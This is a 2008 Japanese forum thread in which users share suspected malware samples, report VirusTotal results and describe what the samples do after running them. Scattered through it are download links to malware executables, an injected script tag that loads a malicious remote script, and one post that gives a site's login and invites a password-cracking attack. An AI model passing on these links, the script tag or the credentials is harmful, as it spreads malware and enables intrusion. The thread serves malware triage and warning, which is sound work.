904名無しさん@お腹いっぱい。:2008/07/31(木) 18:08:30
インスコマーーーーン (´Д⊂
905名無しさん@お腹いっぱい。:2008/08/02(土) 23:49:50
すみません、原田ウイルス00(ダブルオー)というマルウェアを
お持ちの方提供していただけないでしょうか? 未だに遭遇できないので。
906名無しさん@お腹いっぱい。:2008/08/03(日) 21:04:53
>>905
http://tmp7.2ch.net/download/
907名無しさん@お腹いっぱい。:2008/08/04(月) 07:11:31
http://www.gamesrb.com/rbv/uu.exe
http://www.gamesrb.com/rbv/uu.rar

これの駆除に苦労したわー

大手ベンダースルーしまくりだったので要注意
908名無しさん@お腹いっぱい。:2008/08/04(月) 13:34:17
>>907
ttp://www.virustotal.com/analisis/3e853c3d9baa9c893c309cf40e91a2ea
909名無しさん@お腹いっぱい。:2008/08/06(水) 10:03:30
ttp://www.virustotal.com/jp/analisis/1ad8d2f4cbba6f192e54ef4de3182591

やられた…………NOD32無反応…………
910名無しさん@お腹いっぱい。:2008/08/06(水) 13:22:28
>>909
NOD32どころかカスペ以外の主要ベンダーは全滅じゃねーか!!
Symantec、Trend MicroどころかAntiVir、avast!、AVG、BitDefenderまでスルー。
まずはその検体を↑のベンダーに提出してみては?
911名無しさん@お腹いっぱい。:2008/08/06(水) 18:37:59
>910
無論、8/5の時点で提出済み。そのときは、どのソフトもウイルス判定してませんでした。

今日の朝になるまでは、カスペすら全く反応無し。

あからさまにネットワークの使用量が跳ね上がったので、おかしいとは思ったんだけど、
ウイルス判定が全く出なかったので自分の勘違いかと思ったよ。

タスクマネージャみたら、妙な名前のプロセスだけが動いてるもんだから、これ以外、あり得なかったのだが。
アドバンストヒューリスティックエンジンを過信しすぎるのも禁物だな……いい経験になったよ。




912名無しさん@お腹いっぱい。:2008/08/06(水) 21:05:53
http://uploadr.net/file/ac27de91b5
913名無しさん@お腹いっぱい。:2008/08/06(水) 21:10:22
http://uploadr.net/file/ac27de91b5
914名無しさん@お腹いっぱい。:2008/08/06(水) 23:24:10
>>912
AVGが反応したぞ。なんだこれは。
915名無しさん@お腹いっぱい。:2008/08/07(木) 09:53:07
912はAntiVirもavast!もBitDefenderも反応する。
Symantecまで反応するがカスペはスルーした。
916名無しさん@お腹いっぱい。:2008/08/07(木) 10:54:56
>>914-915
他スレで晒されていた"NeorageX"というエミュレータのhack版らしいw
多分、誤検出。
917名無しさん@お腹いっぱい。:2008/08/07(木) 11:00:48
>>916
AntiVir、avast!、AVG、BitDefender、McAfee、NOD32、Symantecまで検出してるのにこれが誤検出?
ここまで主要ベンダーが検出してるのにとても誤検出とは考えにくいんですけど・・・?
918名無しさん@お腹いっぱい。:2008/08/07(木) 11:55:34
>>917
実行してみたけど、普通にエミュレータとして動作したよ?
919名無しさん@お腹いっぱい。:2008/08/07(木) 16:19:55
そんなの検体送ればすぐ分かる事
920名無しさん@お腹いっぱい。:2008/08/07(木) 18:30:45
clamではスルーされたorz
921名無しさん@お腹いっぱい。:2008/08/10(日) 22:07:30
そもそもキーを入力しないと、unpackが進まない予感

パックされた本体(PDATA)を除いて、スタブだけにして送ってみた
(整合性が失われた状態のファイルのスキャン結果は、ベンダのポリシにもよるため、参考値)
http://www.virustotal.com/analisis/2bc3aad954364fa6444106b88f264154
922名無しさん@お腹いっぱい。:2008/08/10(日) 22:47:30
そもそも本当にウイルスなら実行した時点でキーの入力なんて求めるわけないし、
わざわざキーを入力しないとウイルスとして動けないなんてものあるわけないw
923名無しさん@お腹いっぱい。:2008/08/10(日) 23:18:46
…まあ、実行してみたサンドボックスのせいで、
通常要求してこないキー要求があったのかもしれないとも思ってたり
パッカって意外とそんなもん。

っていう雑談
924名無しさん@お腹いっぱい。:2008/08/10(日) 23:36:01
一応>>912のファイルはzlib.dllとneogeoのbiosが無いと起動すらしないはず。
さらに以下のキーを入力しないとちゃんと動作しない。
Emu-Zone
6FB3-2BC0-A3B4-B5A5
925名無しさん@お腹いっぱい。:2008/08/11(月) 00:54:58
Z. 起動はしないけど、制御は本体までたどり着ける
entry 48876c かな
つかこれ、何層パッカかかってるんだか
制御を奪取できればおんなじことなんだが、誤検出だとしたれら、それを招いてる原因にはなるかも

一応、その時点でダンプしたものをVTに押し込んでみた
純粋にダンプしただけ PEファイルとして一貫性はないので、著しく参考値
http://www.virustotal.com/analisis/942814cab7eab062bce1d43ba6a75303

で、本体について
ぱっと見には、通信機能はなさげかもだけど、有害じゃない。と言い切ることは昨今不可能に近いので、
それこそ、サンドボックス内での実行を勧めるというあたりかと
926名無しさん@お腹いっぱい。:2008/08/11(月) 17:05:59
明らかにマイクロソフトじゃない所からメールで
IE最新版ダウンロードとかいってそれらしくexeファイルにリンクされてるんですが
これは危険ですか?
www.altotrabajosverticales.com/images/ie7.0.exe
927名無しさん@お腹いっぱい。:2008/08/11(月) 17:25:21
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FSMALL%2EEBN&VSect=P
928名無しさん@お腹いっぱい。:2008/08/11(月) 20:59:15
途中まで踏んでみた
中にこれ入ってた (UPXかかってるので、サイズはまったく異なる)

http://www.microsoft.com/technet/sysinternals/Miscellaneous/BlueScreen.mspx
http://download.sysinternals.com/Files/BlueScreen.zip

セキュ板に居るくらいの人なら、出てくるエラーの内容で、ただのブルースクリーンじゃないと気づくだろうけど、
(ネタエラーが出てくることもあるし、そうでなくても、見かけない種類のエラーを吐く)
普通だとナンダコリャ?ってなるだろうな

NoDispScrSavPage, NoDispBackgroundPage が設定されるのは、前評判どおり
929名無しさん@お腹いっぱい。:2008/08/11(月) 22:30:48
>>928
そのscrロックされて解除できなくなるそうだ。
930名無しさん@お腹いっぱい。:2008/08/11(月) 22:52:05
うん。NoDispScrSavPage によるところかな、他にもあるのかな
なんにせ、本家のやつで楽しめばおk
931名無しさん@お腹いっぱい。:2008/08/12(火) 16:33:03
>926 さっき俺が踏んでみたww
ニセセキュリティが起動して
お前は感染してるだの何だの言ってきた
IEのTOP(の一部?)とか壁紙とか変えられちまった

ttp://www-2ch.net:8080/up/ ここの
08/08/12(Tue) 15:32:29 のファイルが
その時のスクリーンショットだから
見たいやつは見て来い
932名無しさん@お腹いっぱい。:2008/09/04(木) 00:17:08
http://free.prohosting.com/njdfgse/index3.html

http://fire.prohosting.com/gjkuydft/cgi-bin/ver4/board.cgi?mode=view&no=222
こんばんは、重要なお知らせがあります。
この板で虚空氏(おそらくトリップ盗んだ偽者)の提供品の2つがウィルス仕込みがなされているのはご存知かもしれないですが、どうやらこのウィルスは某所にスクリーンキャプチャの画像を貼り付け、荒らし行為を行うものらしいです。
たまたまそこのキャプチャ画像にここのサイトが映っていたので注意を促しました。
また2chにも同じ名前で書き込みがあることから、2chにも書き込みしているものと思います。

前に公開したツールを使って駆除をオススメ致します。
http://home.no/adobephotoshop/Project1.zip  確認
↑↑↑↑↑↑↑↑↑↑
これお願いします


私が確認している限りではユーザー名が、

Ak○○○sa 氏
倉○広 氏

○は文字が入ります。まえは-Z○N-氏という方がいましたが最近見なくなりました。
もし心あたりがある方、OSを再インストするか駆除ツール使うかしてください。アンチウィルスは対応していないと思われます(キャプチャ画像にノートンがあったので)

管理人さんはこの私の書き込みが適切でなかったら削除されても結構ですが、トップに警告はして頂きたいと思います。

では。

virustotal
ttp://www.virustotal.com/analisis/f179a22ceba59983edf9fdc18a4d311c
933名無しさん@お腹いっぱい。:2008/09/05(金) 09:38:08 BE:662670645-2BP(0)
project1.exeは、ぱっと見、Delphiでぱぱっと作成された、
http://changi.2ch.net/test/read.cgi/download/1220292628/364
のキーを検出し、あれば除去するツールのようです
OEP 45c4e0 問題のアプリ(今件真犯人)の強制終了はできない?
こうゆうときは、マルウェアに人気のパッカではなく、UPXくらいにしといたほうが

プログラムを隅から隅まで読んでいるわけではありませんから、完全な安全判定ではありません
934名無しさん@お腹いっぱい。:2008/09/05(金) 09:56:41 BE:596403263-2BP(0)
あー。強制終了機能ありました うそつきゴメス
935名無しさん@お腹いっぱい。:2008/09/09(火) 08:39:16 BE:894604493-2BP(0)
その後、一部アンチウイルスソフトベンダがクロ判定をしたとのウワサを聞きました
詳細不明なのですけど、念のため、シロ寄りのグレーから、クロ寄りのグレーに変更いたします
936名無しさん@お腹いっぱい。:2008/09/09(火) 23:17:18
>>907
今更ながらhttp://www.gamesrb.com/rbv/uu.exeを踏んでしまいました
ファイルはダウンロードしてないんですが、踏んだだけでNGですか?
937名無しさん@お腹いっぱい。:2008/09/11(木) 00:56:05
単体を実行した際、Windowsディレクトリに何か吐き出すようですので、適宜清掃してください

…そっからすすまん…パッカと砂箱との相性わるいよママン…。(バレちゃう以前に、失敗するらしい)
938名無しさん@お腹いっぱい。:2008/09/11(木) 11:02:41
>>936
実行を選択しなければ問題ない
939名無しさん@お腹いっぱい。:2008/09/11(木) 18:08:50
>>938
ありがとうございます。
次回から気をつけたいと思います。
940名無しさん@お腹いっぱい。:2008/09/13(土) 00:16:03
すみません。
これ、Keygen.exeなんですけど、一瞬コマンドプロンプトの
黒い画面が出て、消えました。それで、何も起こりません。
一応実行する前に、Norton Antivirusでスキャンしたんで
すけど、問題無いとのことでした。
一体何だったんだろう?

http://www3.uploader.jp/dl/pc9801/pc9801_uljp00206.zip.html
941名無しさん@お腹いっぱい。:2008/09/13(土) 01:07:05
>>940
ほらよ
http://www.virustotal.com/jp/analisis/e0d1f2fef396fbc4151b20358e6e0520

黒判定だけど中国製のバスターやキラーだと検出できないよ
942名無しさん@お腹いっぱい。:2008/09/16(火) 21:04:19
ttp://www1.axfc.net/uploader/He/so/138811
DLpass:ayasii
こいつらはどうでしょうか?
943名無しさん@お腹いっぱい。:2008/09/17(水) 18:31:46
>>942
He_138811
http://www.virustotal.com/jp/analisis/10ada89c1891cc25d270c36652e495f4

0001.exe
http://www.virustotal.com/jp/analisis/6dceb21cc09883aad237aa7110ca38dc

keikei_uljp00122.exe
http://www.virustotal.com/jp/analisis/84ff69772e1216738aec7daf6805f2fe
944名無しさん@お腹いっぱい。:2008/09/17(水) 22:41:01
誰でも使えるwebサービスを貼り付けるスレなのここ?
実行してねえじゃんwww
945名無しさん@お腹いっぱい。:2008/09/18(木) 01:15:37
内容によっては、引き受け手が少ない案件もあるのさ
946名無しさん@お腹いっぱい。:2008/09/20(土) 01:17:39
なんでも実行する勇敢で知恵に富んだ者が集まるスレだと思ってた
947名無しさん@お腹いっぱい。:2008/09/21(日) 15:40:08
ここは鑑定スレじゃねーんだよ
948名無しさん@お腹いっぱい。:2008/09/21(日) 15:47:01
http://www3.uploader.jp/dl/ikedango/ikedango_uljp00001.cab.html
949名無しさん@お腹いっぱい。:2008/09/21(日) 19:49:13
実行するまでもなく、フォーマットするかもしれないショートカット
無害でも無益 Shoさんてだれですか
950名無しさん@お腹いっぱい。:2008/09/24(水) 23:57:46
うめ
951名無しさん@お腹いっぱい。:2008/09/27(土) 00:32:07
952名無しさん@お腹いっぱい。:2008/09/28(日) 12:53:56
http://1039045726:65535/jp.js
953名無しさん@お腹いっぱい。:2008/09/28(日) 15:09:41
本体t.gif.gif
954名無しさん@お腹いっぱい。:2008/09/28(日) 15:56:58
>>952
ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2F1039045726%3A65535%2Fjp.js&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
Lineage II 板「<script src=http://1039045726:65535/jp.js></script>」
最近このサイトを見た方は、 ウイルスチェックとパスワードの変更をお勧めします。
>>追記これは少し前に XREA がやられた時と同じタイプなので、 (省略されました・・全てを読むにはここを ...
jbbs.livedoor.jp/game/7135/ - 39k - キャッシュ - 関連ページ - メモをと

ttp://www.virustotal.com/jp/analisis/89ecab35bb571338676d641fa814cca7
955名無しさん@お腹いっぱい。:2008/09/28(日) 21:59:09
>>953
実行してもこの手のタイプのマルウェアは目立った症状がないから
困る。悪玉も見つかんないし。ネトゲインスコされてないから動作してナインかな
956955:2008/09/28(日) 22:19:42
さっきからexplorerの動作が安定しない
やっぱマルウェア動いてんのかな・・・
957名無しさん@お腹いっぱい。:2008/09/29(月) 13:13:29
hostsを書き換えにいったみたいなのと、何かDLLを一個吐いたところまではみたけど、
感染行動が途中で止まっちまったらしい
958名無しさん@お腹いっぱい。:2008/10/04(土) 10:46:45
ニーズのバカが集まるスレ
959名無しさん@お腹いっぱい。:2008/10/04(土) 16:56:27
テスト
960名無しさん@お腹いっぱい。:2008/10/18(土) 14:09:06
ttp://pjc.earthinter.co.jp/
User:todo
Pass:todo
Prease check other member's name and try password crack atack.
961名無しさん@お腹いっぱい。:2008/10/18(土) 14:20:54
侵入テストかなんかでしたら、スレチです
そこが、たとえば改竄を受けている等して、あやしげな何かが貼られているなら、転載してください
962名無しさん@お腹いっぱい。:2008/10/18(土) 19:12:04
ttp://sageuploader.if.land.to/cgi-bin/1upload/src/sage1_7151.mid
↑のファイルを再生したら変な音がして青画面になった後
勝手に再起動してしまいました
どんなウイルスなのか教えてください
963名無しさん@お腹いっぱい。:2008/10/18(土) 19:17:58
ネットワーク
http://pc11.2ch.net/hack/

勇気がなくて踏めない人のための鑑定スレPart18
http://pc11.2ch.net/test/read.cgi/hack/1208760889/
964名無しさん@お腹いっぱい。:2008/10/18(土) 19:21:49
>>963
ごめんありがとそこに行ってくる
965インスコマン ◆qlwUrCXXtM :2008/10/18(土) 22:03:03
>>962
ウイルスでもなんでもない。
ただパソコンブルースクリーンになって落ちるだけ
http://www.dotup.org/uploda/www.dotup.org0878.jpg

ザビビのこのスレ思い出した。テラナツカシス。
http://hack.dot.thebbs.jp/1072610967.1-100
966名無しさん@お腹いっぱい。:2008/10/21(火) 08:26:40
俺が支配されそうですワロタw
967名無しさん@お腹いっぱい。:2008/10/22(水) 03:10:38
http://im3a.atura.jp/bbs5/31207/img/0005871719.zip
某掲示板で拾った物、中身はexeでウイルスらしい
968名無しさん@お腹いっぱい。:2008/10/22(水) 06:34:01
>>967
http://www.virustotal.com/analisis/f33790aa0b7e3d622feceb44b1eac129
969名無しさん@お腹いっぱい。:2008/10/22(水) 09:28:08
35/36にワラタ
970名無しさん@お腹いっぱい。:2008/10/22(水) 23:13:15
半実行してみた hosts書き換えしたりするぽい
中にはいってたファイルあげてみたよ (ゴミがついてるので、サイズとかハッシュはスルーでよろ)

http://www.virustotal.com/analisis/75b11218d0ec2011be7d7ee486d60d3f
971名無しさん@お腹いっぱい。:2008/10/22(水) 23:54:36
ウイルスが古すぎて・・・
ぜんぜんあやしくねーじゃんみたいな
972名無しさん@お腹いっぱい。:2008/10/22(水) 23:59:49
みたいなって・・・
973名無しさん@お腹いっぱい。:2008/10/24(金) 01:16:02
http://www.dotup.org/uploda/www.dotup.org3585.exe.html

これウイルスかわかる方いますか?
virustotalでも微妙な線でした・・・。
974名無しさん@お腹いっぱい。:2008/10/24(金) 01:16:32
ageます
975名無しさん@お腹いっぱい。:2008/10/24(金) 06:00:12
もうありません、404 ご期待に沿えるかどうかわかりかねますが、なんでしたら再うpしてください
976名無しさん@お腹いっぱい。:2008/10/24(金) 16:52:37
いまさらですが「entsver.exe」の最新亜種を踏んでみました
15ai.comとかいう、中華のサイトになにやら怪しげなパケット
飛ばしています
なんか、自虐てきでカワイイ奴ですね
977名無しさん@お腹いっぱい。:2008/11/02(日) 01:52:51
         _,,..,,,,_
        ./ ,' 3  `ヽーっ スヤスヤ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"
978名無しさん@お腹いっぱい。:2008/11/24(月) 16:27:01
age
979名無しさん@お腹いっぱい。:2008/11/24(月) 16:27:39
sage
980名無しさん@お腹いっぱい。:2008/11/24(月) 17:14:17
うんk
981名無しさん@お腹いっぱい。:2008/11/24(月) 21:33:19
sn00p
982名無しさん@お腹いっぱい。:2008/11/24(月) 22:26:26
うめんの?
983名無しさん@お腹いっぱい。:2008/11/24(月) 22:28:16
umeume
984名無しさん@お腹いっぱい。:2008/11/24(月) 22:31:47
         _,,..,,,,_
        ./ ,' 3  `ヽーっ スヤスヤ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"

         _,,..,,,,_
        ./ ,。 3  `ヽーっ スヤスヤ
        l   ⊃ ⌒_つ
         `'ー---‐'''''"
985名無しさん@お腹いっぱい。:2008/11/24(月) 22:35:27
985ゲット
986Qちゃん:2008/11/24(月) 22:43:31
後14km
987Qちゃん:2008/11/24(月) 22:46:24
13
988名無しさん@お腹いっぱい。:2008/11/24(月) 22:47:30
12
989名無しさん@お腹いっぱい。:2008/11/24(月) 22:50:06
11
990名無しさん@お腹いっぱい。:2008/11/24(月) 22:50:19
qq
991名無しさん@お腹いっぱい。:2008/11/24(月) 22:51:02
いきますよ
992名無しさん@お腹いっぱい。:2008/11/24(月) 22:52:51
877
993名無しさん@お腹いっぱい。:2008/11/24(月) 22:53:19
993
994名無しさん@お腹いっぱい。:2008/11/24(月) 22:54:23
ヾ( ´ー`)(^_^;)
995名無しさん@お腹いっぱい。:2008/11/24(月) 22:55:07
umeee
996名無しさん@お腹いっぱい。:2008/11/24(月) 22:55:33
996
997名無しさん@お腹いっぱい。:2008/11/24(月) 22:56:35
99!!
998名無しさん@お腹いっぱい。:2008/11/24(月) 22:58:17
98?
999名無しさん@お腹いっぱい。:2008/11/24(月) 23:00:38
テスト
1000名無しさん@お腹いっぱい。:2008/11/24(月) 23:01:30
last一本
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。